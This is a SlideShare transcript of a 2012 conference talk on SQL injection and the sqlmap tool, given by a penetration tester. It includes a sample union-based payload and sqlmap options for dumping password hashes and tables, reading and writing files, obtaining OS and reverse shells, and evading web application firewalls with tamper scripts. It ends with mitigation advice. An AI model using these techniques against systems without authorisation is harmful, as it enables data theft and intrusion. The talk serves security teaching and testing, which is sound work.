SQL injection with sqlmap                          Herman Duarte <hcoduarte@gmail.com>Tuesday, December 4, 12             ...
About me              Consultant @ INTEGRITY S.A. - www.integrity.pt              Penetration testing engagements         ...
Roadmap              SQL injection (SQLi) 101              sqlmap              Mitigation techniques              Wrap-upT...
SQLi 101: Definition              Definition:                    SQL injection occurs when it is possible to inject SQL     ...
SQLi 101: Structure              ...?name=robert’ union all select null,@@version,null #                          Prefix   ...
sqlmap              Developed in python              Prerequisites to run sqlmap:                    Python 2.6.x or 2.7.x...
sqlmap              Mainly developed by:                Bernardo Damele A.G.   Miroslav Stampar                     (@inqu...
sqlmap: Scenarios              Find and explore SQL injection in web applications              Direct connection (database...
sqlmap: Workflow              Select your target              Identify possible injection points              Identify SQLi...
sqlmap: Target selection              -u “<url>” (e.g. https://webapp.com/news.php?id=1)              -r <request file>    ...
sqlmap: Injection points              GET parameters              POST parameters              Cookie header values (only ...
sqlmap: Finding SQLi (I)              ./sqlmap.py -u “https://webapp.com/news.php?id=1”              or              ./sql...
sqlmap: Finding SQLi (II)              --level=<level> (1...5 - default is 1)                    With --level=5 every comb...
sqlmap: SQLi techniques/types              --technique=SU (default is all of them: BEUST)              Boolean-based blind...
sqlmap: Supported DBMSs                --dbms=mssql | mysql | postgresql | oracle ...                  Microsoft SQL Serve...
sqlmap: Logging / Verbosity              Logs all HTTP traffic in a text file: -t <output file>              Save options use...
sqlmap: Enumeration (I)              Objective:                    Get data from the DBMS tables (limited the privileges t...
sqlmap: Enumeration (II)              What can you get:                    ...                    List the DBMS users: --u...
sqlmap: Enumeration (III)              What can you get:                    ...                    List all columns or jus...
sqlmap: Enumeration (IV)              What can you get:                    ...                          Executing a custom...
sqlmap: File system access              Objective:                    Read and write any textual or binary file from the DB...
sqlmap: OS pwnage (I)              Objective:                    Get access to the DBMS O.S. and the Internal network (if ...
sqlmap: OS pwnage (II)              To execute an OS command:                    --os-cmd=”<command to execute>”          ...
sqlmap: Tamper scripts              Tamper scripts:                    --tamper <script file path>[,<script file path>]     ...
sqlmap                          DEMOTuesday, December 4, 12          25
sqlmap: Tips              If HTTPS is being used, don’t forget to set: --force-ssl              Get the most info as you c...
Mitigation Techniques              Sanitize input              Use prepared statements / bind variables              Config...
Wrap-up              Input sanitization              Use prepared statements              Least-privilege principle is you...
References              https://sqlmap.org              Advanced SQL injection to operating system full              contr...
Thank You!                                   Q&A         	       Herman Duarte         	       @hdontwit         	       h...
Upcoming SlideShare
Loading in …5
×

Sql injection with sqlmap

51,950 views

Published on

Slides that I used when I presented @ Confraria VI and Security&IT in November 2012

  • Be the first to comment

Sql injection with sqlmap

  1. 1. SQL injection with sqlmap Herman Duarte <hcoduarte@gmail.com>Tuesday, December 4, 12 1
  2. 2. About me Consultant @ INTEGRITY S.A. - www.integrity.pt Penetration testing engagements BSc in Information Systems and Computer Engineering CISSP Associate / ISO27001LA / CCNA Security addict :)Tuesday, December 4, 12 2
  3. 3. Roadmap SQL injection (SQLi) 101 sqlmap Mitigation techniques Wrap-upTuesday, December 4, 12 3
  4. 4. SQLi 101: Definition Definition: SQL injection occurs when it is possible to inject SQL commands in data-plane input in order to affect the execution of predefined SQL statements It affects any application that uses non-sanitized user-supplied input, in dynamic SQL query constructions (e.g. web apps, fat clients) Cause: Bad programming practices + Lack of knowledge/ awarenessTuesday, December 4, 12 4
  5. 5. SQLi 101: Structure ...?name=robert’ union all select null,@@version,null # Prefix Payload Suffix $query = “SELECT name,status,age FROM user WHERE name=’” . $_REQUEST[‘search’] . “‘ AND age > 42”;Tuesday, December 4, 12 5
  6. 6. sqlmap Developed in python Prerequisites to run sqlmap: Python 2.6.x or 2.7.x To install: git clone https://github.com/sqlmapproject/sqlmap.git sqlmap To update: python sqlmap.py --update git pullTuesday, December 4, 12 6
  7. 7. sqlmap Mainly developed by: Bernardo Damele A.G. Miroslav Stampar (@inquisb) (@stramparm)Tuesday, December 4, 12 7
  8. 8. sqlmap: Scenarios Find and explore SQL injection in web applications Direct connection (database account is needed) DBMS python binding installed (e.g. PyMySQL) -d <dbms>://<user>:<password>@<ip>:<port>/<db_name>Tuesday, December 4, 12 8
  9. 9. sqlmap: Workflow Select your target Identify possible injection points Identify SQLi vulnerabilities: By using sqlmap Manual testing :) Exploit SQLi vunerabilities: Enumerate File system access OS pwnage Own the internal network (w00t! w00t!)Tuesday, December 4, 12 9
  10. 10. sqlmap: Target selection -u “<url>” (e.g. https://webapp.com/news.php?id=1) -r <request file> GET /news.php?id=1&Submit=Submit HTTP/1.1 Host: webapp.com User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: https://webapp.com/index.php Cookie: PHPSESSID=l7uo2lheu067qrs8fjj0bab777; DNT: 1Tuesday, December 4, 12 10
  11. 11. sqlmap: Injection points GET parameters POST parameters Cookie header values (only if --level >= 2) User-Agent header value (only if --level >= 3) Referer header value (only if --level >= 3)Tuesday, December 4, 12 11
  12. 12. sqlmap: Finding SQLi (I) ./sqlmap.py -u “https://webapp.com/news.php?id=1” or ./sqlmap.y -r news_get_request --force-ssl Default behavior: Tests all GET and/or POST parameters, for all SQLi types, for all databases (if not discovered during tests) Yes it may take a long time, and it doesn’t cover all tests sqlmap can do.Tuesday, December 4, 12 12
  13. 13. sqlmap: Finding SQLi (II) --level=<level> (1...5 - default is 1) With --level=5 every combination of payload, prefix and suffix will be tested on all injection points available (noisier but gives more coverage) --risk=<risk> (0...3) - default is 1) To do tests using OR --risk=3. Why? Imagine this: UPDATE user SET disabled=1 WHERE email=email@email.com OR 1=1# -p <param to test>[, <param to test>]Tuesday, December 4, 12 13
  14. 14. sqlmap: SQLi techniques/types --technique=SU (default is all of them: BEUST) Boolean-based blind Based on page changes, data is inferred, char by char Error-based Uses the errors that are displayed to extract data Union query-based Changes the SQL queries to extract data Stacked queries Semi-colon are used to inject multiple statements on the SQL query Time-based blind Based on time, data is inferred, char by charTuesday, December 4, 12 14
  15. 15. sqlmap: Supported DBMSs --dbms=mssql | mysql | postgresql | oracle ... Microsoft SQL Server SAP MaxDB MySQL Sybase PostgreSQL Firebird Oracle SQLite IBM DB2 Microsoft AccessTuesday, December 4, 12 15
  16. 16. sqlmap: Logging / Verbosity Logs all HTTP traffic in a text file: -t <output file> Save options used in command line: --save <file> Verbosity : -v <0..6> (default 1) -v 6 same as -t but, output to consoleTuesday, December 4, 12 16
  17. 17. sqlmap: Enumeration (I) Objective: Get data from the DBMS tables (limited the privileges the current DBMS user have) What can you get: DBMS exact version, O.S. information, architecture and patch level: -f DBMS banner: -b DBMS server hostname: --hostname DBMS user the application is using: --current-user Applications current DB: --current-db If the current user is a DBA: --is-dbaTuesday, December 4, 12 17
  18. 18. sqlmap: Enumeration (II) What can you get: ... List the DBMS users: --users List all DBMS users, password hashes: --passwords sqlmap will automatically try to crack the hashes with a dictionary attack List users privileges: --privileges List all available databases: --dbs List all tables or just for a specific database: --tables (-D <database name>)Tuesday, December 4, 12 18
  19. 19. sqlmap: Enumeration (III) What can you get: ... List all columns or just for a specific table from that database: --columns (-T <table name> -D <db name>) Count table entries: --count Dump data from a database/table/column: --dump (-D, -T, -C can be used to select what data to dump) --dump-all (I don’t recommend it) Search for a specific or part of a database name, table name or column name: --search= (-D, -T, -C to specify what to search)Tuesday, December 4, 12 19
  20. 20. sqlmap: Enumeration (IV) What can you get: ... Executing a custom SQL query: --sql-query=”<sql query to execute>” Interactive SQL shell to execute all your custom SQL queries: --sql-shellTuesday, December 4, 12 20
  21. 21. sqlmap: File system access Objective: Read and write any textual or binary file from the DBMS O.S. Prerequisites: DBMS = mssql | mysql | postgresql Current DBMS user must have the necessary privileges Read: --file-read=”<file path>” Write: --file-write=”<file local path>” --file-dest=”<remote file location path>”Tuesday, December 4, 12 21
  22. 22. sqlmap: OS pwnage (I) Objective: Get access to the DBMS O.S. and the Internal network (if DBMS server in the internal network) Prerequisites: DBMS = mssql | mysql | postgresql Current DBMS user must have the necessary privileges What can you do? Get a reverse shell if the DB can: connect to the internet ping your server (yes an icmp shell :)) Establish a VNC connectionTuesday, December 4, 12 22
  23. 23. sqlmap: OS pwnage (II) To execute an OS command: --os-cmd=”<command to execute>” To get an OS shell: --os-shell To get a meterpreter shell, an icmpshell or VNC: --os-pwn --msf-path=”<msf path>” Store procedure privilege escalation (buffer overflow): --bofTuesday, December 4, 12 23
  24. 24. sqlmap: Tamper scripts Tamper scripts: --tamper <script file path>[,<script file path>] tamper/bluecoat.py def tamper(payload, headers=None): Example: * Input: SELECT id FROM users where id = 1 * Output: SELECT%09id FROM users where id LIKE 1 Requirement: * MySQL, Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147 if payload: retVal = re.sub(r"(?i)(SELECT|UPDATE|INSERT|DELETE)s+", r"g<1>t", payload) retVal = re.sub(r"s*=s*", " LIKE ", retVal)Tuesday, December 4, 12 24
  25. 25. sqlmap DEMOTuesday, December 4, 12 25
  26. 26. sqlmap: Tips If HTTPS is being used, don’t forget to set: --force-ssl Get the most info as you can before starting to find SQLi vulnerabilities. It will save you time. Union-based gives more data with less requests, use it Time-based blind SQLi is faster to check in comparison to Union-based query (in cases where a lot of columns are used) If --is-dba=true, --technique=S you can start to gangnam styleTuesday, December 4, 12 26
  27. 27. Mitigation Techniques Sanitize input Use prepared statements / bind variables Configure DBMS users configured with least-privilege principle in mind Use generic errors don’t pass them to the user In case the web application source code can’t be changed, a proxy can be used, between the web server and the database server (e.g. GreenSQL)Tuesday, December 4, 12 27
  28. 28. Wrap-up Input sanitization Use prepared statements Least-privilege principle is your friend (use it!) Have I said to use prepared statements ?! :) Do code reviewsTuesday, December 4, 12 28
  29. 29. References https://sqlmap.org Advanced SQL injection to operating system full control - http://www.slideshare.net/inquis/advanced- sql-injection-to-operating-system-full-control- whitepaper-4633857 SQL Injection Attacks and Defenses - http:// www.amazon.com/Injection-Attacks-Defense-Justin- Clarke/dp/1597494240Tuesday, December 4, 12 29
  30. 30. Thank You! Q&A Herman Duarte @hdontwit https://www.linkedin.com/in/hcoduarte hcoduarte@gmail.comTuesday, December 4, 12 30

×